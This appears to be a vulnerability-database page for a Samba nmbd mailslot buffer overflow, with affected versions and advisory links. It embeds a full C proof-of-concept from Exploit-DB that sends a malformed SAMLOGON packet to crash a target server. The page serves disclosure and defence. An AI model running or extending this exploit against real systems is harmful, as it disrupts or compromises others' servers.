Notifications for a CVE
Stay informed of any changes for a specific CVE.
CVE Descriptions
Stack-based buffer overflow in the send_mailslot function in nmbd in Samba 3.0.0 through 3.0.27a, when the "domain logons" option is enabled, allows remote attackers to execute arbitrary code via a GETDC mailslot request composed of a long GETDC string following an offset username in a SAMLOGON logon request.
CVE Informations
Related Weaknesses
| Weakness Name | Source | |
|---|---|---|
| Improper Restriction of Operations within the Bounds of a Memory Buffer The product performs operations on a memory buffer, but it reads from or writes to a memory location outside the buffer's intended boundary. This may result in read or write operations on unexpected memory locations that could be linked to other variables, data structures, or internal program data. |
Metrics
| Metrics | Score | Severity | CVSS Vector | Source |
|---|---|---|---|---|
| V2 | 9.3 | AV:N/AC:M/Au:N/C:C/I:C/A:C | [email protected] |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 4732
Publication date : 2007-12-13 23h00 +00:00
Author : x86
EDB Verified : Yes
/* http://secunia.com/secunia_research/2007-99/advisory/
*
* A remote attacker could send a specially crafted "SAMLOGON" domain
* logon packet, possibly leading to the execution of arbitrary code with
* elevated privileges. Note that this vulnerability is exploitable only
* when domain logon support is enabled in Samba.
*
* ///////
*
* Sample/simple POC [crash only] by a bored guy at asmx86 gmail [com], further exploitation or not.. is left as an exercise to the reader.
*
* laneleb & petemir, a true love in this world! hi!
*
* kangaroo kangaroo...
*/
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <assert.h>
#include <stdint.h>
/* smb ripped defines/etc */
#define MAX_DGRAM_SIZE 576
#define MAX_NETBIOSNAME_LEN 16
typedef char nstring[MAX_NETBIOSNAME_LEN];
typedef char unstring[MAX_NETBIOSNAME_LEN*4];
enum node_type {B_NODE=0, P_NODE=1, M_NODE=2, NBDD_NODE=3};
#define PTR_DIFF(p1,p2) (/*(ptrdiff_t)*/(((const char *)(p1)) - (const char *)(p2)))
#define CVAL_NC(buf,pos) (((unsigned char *)(buf))[pos]) /* Non-const version of CVAL */
#define SSVALX(buf,pos,val) (CVAL_NC(buf,pos)=(unsigned char)((val)&0xFF),CVAL_NC(buf,pos+1)=(unsigned char)((val)>>8))
#define SSVAL(buf,pos,val) SSVALX((buf),(pos),((uint16_t)(val)))
#define SCVAL(buf,pos,val) (CVAL_NC(buf,pos) = (val))
/* A netbios name structure. */
struct nmb_name {
nstring name;
char scope[64];
unsigned int name_type;
};
void safe_strcpy(char *a, char *b, uint32_t size)
{
strcpy(b, a);
}
void put_name(char *dest, const char *name, int pad, unsigned int name_type)
{
size_t len = strlen(name);
memcpy(dest, name, (len < MAX_NETBIOSNAME_LEN) ? len : MAX_NETBIOSNAME_LEN - 1);
if (len < MAX_NETBIOSNAME_LEN - 1)
{
memset(dest + len, pad, MAX_NETBIOSNAME_LEN - 1 - len);
}
dest[MAX_NETBIOSNAME_LEN - 1] = name_type;
}
int put_nmb_name(char *buf,int offset,struct nmb_name *name)
{
int ret,m;
nstring buf1;
char *p;
if (strcmp(name->name,"*") == 0)
{
/* special case for wildcard name */
put_name(buf1, "*", '\0', name->name_type);
}
else
{
put_name(buf1, name->name, ' ', name->name_type);
}
buf[offset] = 0x20;
ret = 34;
for (m=0;m<MAX_NETBIOSNAME_LEN;m++)
{
buf[offset+1+2*m] = 'A' + ((buf1[m]>>4)&0xF);
buf[offset+2+2*m] = 'A' + (buf1[m]&0xF);
}
offset += 33;
buf[offset] = 0;
if (name->scope[0])
{
/* XXXX this scope handling needs testing */
ret += strlen(name->scope) + 1;
safe_strcpy(&buf[offset+1],name->scope,sizeof(name->scope));
p = &buf[offset+1];
while ((p = strchr(p,'.')))
{
buf[offset] = PTR_DIFF(p,&buf[offset+1]);
offset += (buf[offset] + 1);
p = &buf[offset+1];
}
buf[offset] = strlen(&buf[offset+1]);
}
return(ret);
}
typedef struct exudp_s
{
unsigned char msg_type;
unsigned char flags;
uint16_t dgm_id;
uint32_t source_ip;
uint16_t source_port;
uint16_t dgm_len;
uint16_t pOffset;
struct nmb_name source_name;
struct nmb_name dest_name;
} exudp;
/* code */
int send_udp(int ip, char *packet, unsigned int packetSize)
{
int fd;
struct sockaddr_in to;
int len;
if( (fd = socket(AF_INET, SOCK_DGRAM, 0)) < 0)
return 0;
to.sin_family = AF_INET;
to.sin_addr.s_addr = ip;
to.sin_port = htons(138);
if( (len = sendto(fd, packet, packetSize, 0, (struct sockaddr *)&to, sizeof(struct sockaddr_in))) < 0)
{
perror("sendto");
return 0;
}
return len;
}
int main(int argc, char *argv[])
{
unsigned char samlogon[10240];
unsigned int nlOffset;
exudp dgPacket;
printf("smb_mailslot() POC by [email protected]\n\n");
if(argc < 3)
{
printf("Usage: %s <uppercase victim's netbios name> <victim's ip>\n\n", argv[0]);
exit(1);
}
if(strlen(argv[1]) > 15)
{
printf("[!] netbios victim's name too long\n");
exit(1);
}
memset(samlogon, 0, sizeof(samlogon));
dgPacket.msg_type = 0x11;
dgPacket.flags = 1;
dgPacket.dgm_id = 0xdead;
dgPacket.source_ip = 0xdeadbeef;
dgPacket.source_port = 0xc0fe;
dgPacket.dgm_len = 0;
dgPacket.pOffset = 0;
strcpy(dgPacket.source_name.name, "ASMX86@GMAILCOM");
strcpy(dgPacket.dest_name.name, argv[1]);
nlOffset = 14;
nlOffset += put_nmb_name((char *)&samlogon, nlOffset, &dgPacket.source_name);
nlOffset += put_nmb_name((char *)&samlogon, nlOffset, &dgPacket.dest_name);
#define OFFSET 97
nlOffset -= 4;
SCVAL(samlogon, nlOffset+4, 0);
SSVAL(samlogon, nlOffset+4+OFFSET, 18);
SCVAL(samlogon, nlOffset+7, 0);
SCVAL(samlogon, nlOffset+8, 0x25);
SSVAL(samlogon, nlOffset+59, 397);
SSVAL(samlogon, nlOffset+61, OFFSET);
SSVAL(samlogon, nlOffset+63, 0);
SSVAL(samlogon, nlOffset+36, 12);
memcpy(&samlogon[nlOffset+39+(12*2)], "\\MAILSLOT\\NET\\NTLOGON", 21);
memcpy(&samlogon[nlOffset+4+OFFSET+4], "\x41\x00\x41\x00\x00\x00", 6);
memcpy(&samlogon[nlOffset+4+OFFSET+4+6-1], "\x42\x00\x42\x00\x00\x00", 6);
memset(&samlogon[nlOffset+4+OFFSET+4+6+6], '\x43', 260); //play with this value ;)
nlOffset = 576;
dgPacket.dgm_len = nlOffset - 14;
dgPacket.dgm_len = htons(dgPacket.dgm_len);
memcpy(&samlogon, &dgPacket, 14);
if(!send_udp(inet_addr(argv[2]), samlogon, nlOffset))
fprintf(stderr, "[!] Error sending UDP packet\n");
else
fprintf(stderr, "[*] packet sent\n");
return 0;
}
//eof
// milw0rm.com [2007-12-14]
Products Mentioned
Configuraton 0
Samba>>Samba >> Version 2.0.1
- Samba>>Samba >> Version 2.0.1 (Open CPE detail)
Samba>>Samba >> Version 2.0.2
- Samba>>Samba >> Version 2.0.2 (Open CPE detail)
Samba>>Samba >> Version 2.0.3
- Samba>>Samba >> Version 2.0.3 (Open CPE detail)
Samba>>Samba >> Version 2.0.4
- Samba>>Samba >> Version 2.0.4 (Open CPE detail)
Samba>>Samba >> Version 2.0.5
- Samba>>Samba >> Version 2.0.5 (Open CPE detail)
- Samba>>Samba >> Version 2.0.5 (Open CPE detail)
- Samba>>Samba >> Version 2.0.5 (Open CPE detail)
Samba>>Samba >> Version 2.0.6
- Samba>>Samba >> Version 2.0.6 (Open CPE detail)
Samba>>Samba >> Version 2.0.7
- Samba>>Samba >> Version 2.0.7 (Open CPE detail)
Samba>>Samba >> Version 2.0.8
- Samba>>Samba >> Version 2.0.8 (Open CPE detail)
Samba>>Samba >> Version 2.0.9
- Samba>>Samba >> Version 2.0.9 (Open CPE detail)
Samba>>Samba >> Version 2.0.10
- Samba>>Samba >> Version 2.0.10 (Open CPE detail)
Samba>>Samba >> Version 2.2.0
- Samba>>Samba >> Version 2.2.0 (Open CPE detail)
- Samba>>Samba >> Version 2.2.0 (Open CPE detail)
- Samba>>Samba >> Version 2.2.0 (Open CPE detail)
Samba>>Samba >> Version 2.2.0a
- Samba>>Samba >> Version 2.2.0a (Open CPE detail)
Samba>>Samba >> Version 2.2.1a
- Samba>>Samba >> Version 2.2.1a (Open CPE detail)
Samba>>Samba >> Version 2.2.2
- Samba>>Samba >> Version 2.2.2 (Open CPE detail)
Samba>>Samba >> Version 2.2.3
- Samba>>Samba >> Version 2.2.3 (Open CPE detail)
- Samba>>Samba >> Version 2.2.3 (Open CPE detail)
- Samba>>Samba >> Version 2.2.3 (Open CPE detail)
Samba>>Samba >> Version 2.2.3a
- Samba>>Samba >> Version 2.2.3a (Open CPE detail)
Samba>>Samba >> Version 2.2.4
- Samba>>Samba >> Version 2.2.4 (Open CPE detail)
Samba>>Samba >> Version 2.2.5
- Samba>>Samba >> Version 2.2.5 (Open CPE detail)
Samba>>Samba >> Version 2.2.6
- Samba>>Samba >> Version 2.2.6 (Open CPE detail)
Samba>>Samba >> Version 2.2.7
- Samba>>Samba >> Version 2.2.7 (Open CPE detail)
- Samba>>Samba >> Version 2.2.7 (Open CPE detail)
- Samba>>Samba >> Version 2.2.7 (Open CPE detail)
Samba>>Samba >> Version 2.2.7a
- Samba>>Samba >> Version 2.2.7a (Open CPE detail)
Samba>>Samba >> Version 2.2.8
- Samba>>Samba >> Version 2.2.8 (Open CPE detail)
- Samba>>Samba >> Version 2.2.8 (Open CPE detail)
- Samba>>Samba >> Version 2.2.8 (Open CPE detail)
Samba>>Samba >> Version 2.2.8a
- Samba>>Samba >> Version 2.2.8a (Open CPE detail)
Samba>>Samba >> Version 2.2.9
- Samba>>Samba >> Version 2.2.9 (Open CPE detail)
Samba>>Samba >> Version 2.2.11
- Samba>>Samba >> Version 2.2.11 (Open CPE detail)
Samba>>Samba >> Version 2.2.12
- Samba>>Samba >> Version 2.2.12 (Open CPE detail)
Samba>>Samba >> Version 3.0.0
- Samba>>Samba >> Version 3.0.0 (Open CPE detail)
Samba>>Samba >> Version 3.0.1
- Samba>>Samba >> Version 3.0.1 (Open CPE detail)
Samba>>Samba >> Version 3.0.2
- Samba>>Samba >> Version 3.0.2 (Open CPE detail)
- Samba>>Samba >> Version 3.0.2 (Open CPE detail)
- Samba>>Samba >> Version 3.0.2 (Open CPE detail)
Samba>>Samba >> Version 3.0.2a
- Samba>>Samba >> Version 3.0.2a (Open CPE detail)
Samba>>Samba >> Version 3.0.10
- Samba>>Samba >> Version 3.0.10 (Open CPE detail)
Samba>>Samba >> Version 3.0.11
- Samba>>Samba >> Version 3.0.11 (Open CPE detail)
Samba>>Samba >> Version 3.0.12
- Samba>>Samba >> Version 3.0.12 (Open CPE detail)
Samba>>Samba >> Version 3.0.13
- Samba>>Samba >> Version 3.0.13 (Open CPE detail)
Samba>>Samba >> Version 3.0.14
- Samba>>Samba >> Version 3.0.14 (Open CPE detail)
- Samba>>Samba >> Version 3.0.14 (Open CPE detail)
- Samba>>Samba >> Version 3.0.14 (Open CPE detail)
Samba>>Samba >> Version 3.0.14a
- Samba>>Samba >> Version 3.0.14a (Open CPE detail)
Samba>>Samba >> Version 3.0.20
- Samba>>Samba >> Version 3.0.20 (Open CPE detail)
- Samba>>Samba >> Version 3.0.20 (Open CPE detail)
- Samba>>Samba >> Version 3.0.20 (Open CPE detail)
- Samba>>Samba >> Version 3.0.20 (Open CPE detail)
Samba>>Samba >> Version 3.0.20a
- Samba>>Samba >> Version 3.0.20a (Open CPE detail)
Samba>>Samba >> Version 3.0.20b
- Samba>>Samba >> Version 3.0.20b (Open CPE detail)
Samba>>Samba >> Version 3.0.21
- Samba>>Samba >> Version 3.0.21 (Open CPE detail)
- Samba>>Samba >> Version 3.0.21 (Open CPE detail)
- Samba>>Samba >> Version 3.0.21 (Open CPE detail)
- Samba>>Samba >> Version 3.0.21 (Open CPE detail)
- Samba>>Samba >> Version 3.0.21 (Open CPE detail)
Samba>>Samba >> Version 3.0.21a
- Samba>>Samba >> Version 3.0.21a (Open CPE detail)
Samba>>Samba >> Version 3.0.21b
- Samba>>Samba >> Version 3.0.21b (Open CPE detail)
Samba>>Samba >> Version 3.0.21c
- Samba>>Samba >> Version 3.0.21c (Open CPE detail)
Samba>>Samba >> Version 3.0.22
- Samba>>Samba >> Version 3.0.22 (Open CPE detail)
Samba>>Samba >> Version 3.0.23a
- Samba>>Samba >> Version 3.0.23a (Open CPE detail)
Samba>>Samba >> Version 3.0.23b
- Samba>>Samba >> Version 3.0.23b (Open CPE detail)
Samba>>Samba >> Version 3.0.23c
- Samba>>Samba >> Version 3.0.23c (Open CPE detail)
Samba>>Samba >> Version 3.0.23d
- Samba>>Samba >> Version 3.0.23d (Open CPE detail)
Samba>>Samba >> Version 3.0.24
- Samba>>Samba >> Version 3.0.24 (Open CPE detail)
Samba>>Samba >> Version 3.0.25
- Samba>>Samba >> Version 3.0.25 (Open CPE detail)
- Samba>>Samba >> Version 3.0.25 (Open CPE detail)
- Samba>>Samba >> Version 3.0.25 (Open CPE detail)
- Samba>>Samba >> Version 3.0.25 (Open CPE detail)
- Samba>>Samba >> Version 3.0.25 (Open CPE detail)
- Samba>>Samba >> Version 3.0.25 (Open CPE detail)
- Samba>>Samba >> Version 3.0.25 (Open CPE detail)
- Samba>>Samba >> Version 3.0.25 (Open CPE detail)
- Samba>>Samba >> Version 3.0.25 (Open CPE detail)
- Samba>>Samba >> Version 3.0.25 (Open CPE detail)
Samba>>Samba >> Version 3.0.25
- Samba>>Samba >> Version 3.0.25 (Open CPE detail)
Samba>>Samba >> Version 3.0.25
- Samba>>Samba >> Version 3.0.25 (Open CPE detail)
Samba>>Samba >> Version 3.0.25
- Samba>>Samba >> Version 3.0.25 (Open CPE detail)
Samba>>Samba >> Version 3.0.25
- Samba>>Samba >> Version 3.0.25 (Open CPE detail)
Samba>>Samba >> Version 3.0.25
- Samba>>Samba >> Version 3.0.25 (Open CPE detail)
Samba>>Samba >> Version 3.0.25a
- Samba>>Samba >> Version 3.0.25a (Open CPE detail)
Samba>>Samba >> Version 3.0.25b
- Samba>>Samba >> Version 3.0.25b (Open CPE detail)
Samba>>Samba >> Version 3.0.25c
- Samba>>Samba >> Version 3.0.25c (Open CPE detail)
Samba>>Samba >> Version 3.0.26
- Samba>>Samba >> Version 3.0.26 (Open CPE detail)
- Samba>>Samba >> Version 3.0.26 (Open CPE detail)
- Samba>>Samba >> Version 3.0.26 (Open CPE detail)
Samba>>Samba >> Version 3.0.26a
- Samba>>Samba >> Version 3.0.26a (Open CPE detail)
Samba>>Samba >> Version 3.0.27
- Samba>>Samba >> Version 3.0.27 (Open CPE detail)
- Samba>>Samba >> Version 3.0.27 (Open CPE detail)
- Samba>>Samba >> Version 3.0.27 (Open CPE detail)
References
http://lists.vmware.com/pipermail/security-announce/2008/000005.html
Tags : mailing-list, x_refsource_MLIST
Tags : mailing-list, x_refsource_MLIST
http://sunsolve.sun.com/search/document.do?assetkey=1-77-1019295.1-1
Tags : vendor-advisory, x_refsource_SUNALERT
Tags : vendor-advisory, x_refsource_SUNALERT
http://sunsolve.sun.com/search/document.do?assetkey=1-26-238251-1
Tags : vendor-advisory, x_refsource_SUNALERT
Tags : vendor-advisory, x_refsource_SUNALERT
http://www.novell.com/linux/security/advisories/2007_68_samba.html
Tags : vendor-advisory, x_refsource_SUSE
Tags : vendor-advisory, x_refsource_SUSE
http://www11.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c01475657
Tags : vendor-advisory, x_refsource_HP
Tags : vendor-advisory, x_refsource_HP
http://www.securityfocus.com/archive/1/485144/100/0/threaded
Tags : mailing-list, x_refsource_BUGTRAQ
Tags : mailing-list, x_refsource_BUGTRAQ
http://www.securityfocus.com/archive/1/488457/100/0/threaded
Tags : mailing-list, x_refsource_BUGTRAQ
Tags : mailing-list, x_refsource_BUGTRAQ
http://www.mandriva.com/security/advisories?name=MDKSA-2007:244
Tags : vendor-advisory, x_refsource_MANDRIVA
Tags : vendor-advisory, x_refsource_MANDRIVA
http://www11.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c01475657
Tags : vendor-advisory, x_refsource_HP
Tags : vendor-advisory, x_refsource_HP
http://www.securityfocus.com/archive/1/484818/100/0/threaded
Tags : mailing-list, x_refsource_BUGTRAQ
Tags : mailing-list, x_refsource_BUGTRAQ
http://slackware.com/security/viewer.php?l=slackware-security&y=2007&m=slackware-security.451554
Tags : vendor-advisory, x_refsource_SLACKWARE
Tags : vendor-advisory, x_refsource_SLACKWARE
https://www.redhat.com/archives/fedora-package-announce/2007-December/msg00304.html
Tags : vendor-advisory, x_refsource_FEDORA
Tags : vendor-advisory, x_refsource_FEDORA
https://www.redhat.com/archives/fedora-package-announce/2007-December/msg00308.html
Tags : vendor-advisory, x_refsource_FEDORA
Tags : vendor-advisory, x_refsource_FEDORA
http://lists.apple.com/archives/security-announce/2008/Feb/msg00002.html
Tags : vendor-advisory, x_refsource_APPLE
Tags : vendor-advisory, x_refsource_APPLE
http://www.securityfocus.com/archive/1/484825/100/0/threaded
Tags : mailing-list, x_refsource_BUGTRAQ
Tags : mailing-list, x_refsource_BUGTRAQ
http://www.securityfocus.com/archive/1/484827/100/0/threaded
Tags : mailing-list, x_refsource_BUGTRAQ
Tags : mailing-list, x_refsource_BUGTRAQ
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A11572
Tags : vdb-entry, signature, x_refsource_OVAL
Tags : vdb-entry, signature, x_refsource_OVAL
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A5605
Tags : vdb-entry, signature, x_refsource_OVAL
Tags : vdb-entry, signature, x_refsource_OVAL
2025©
tesweb SA
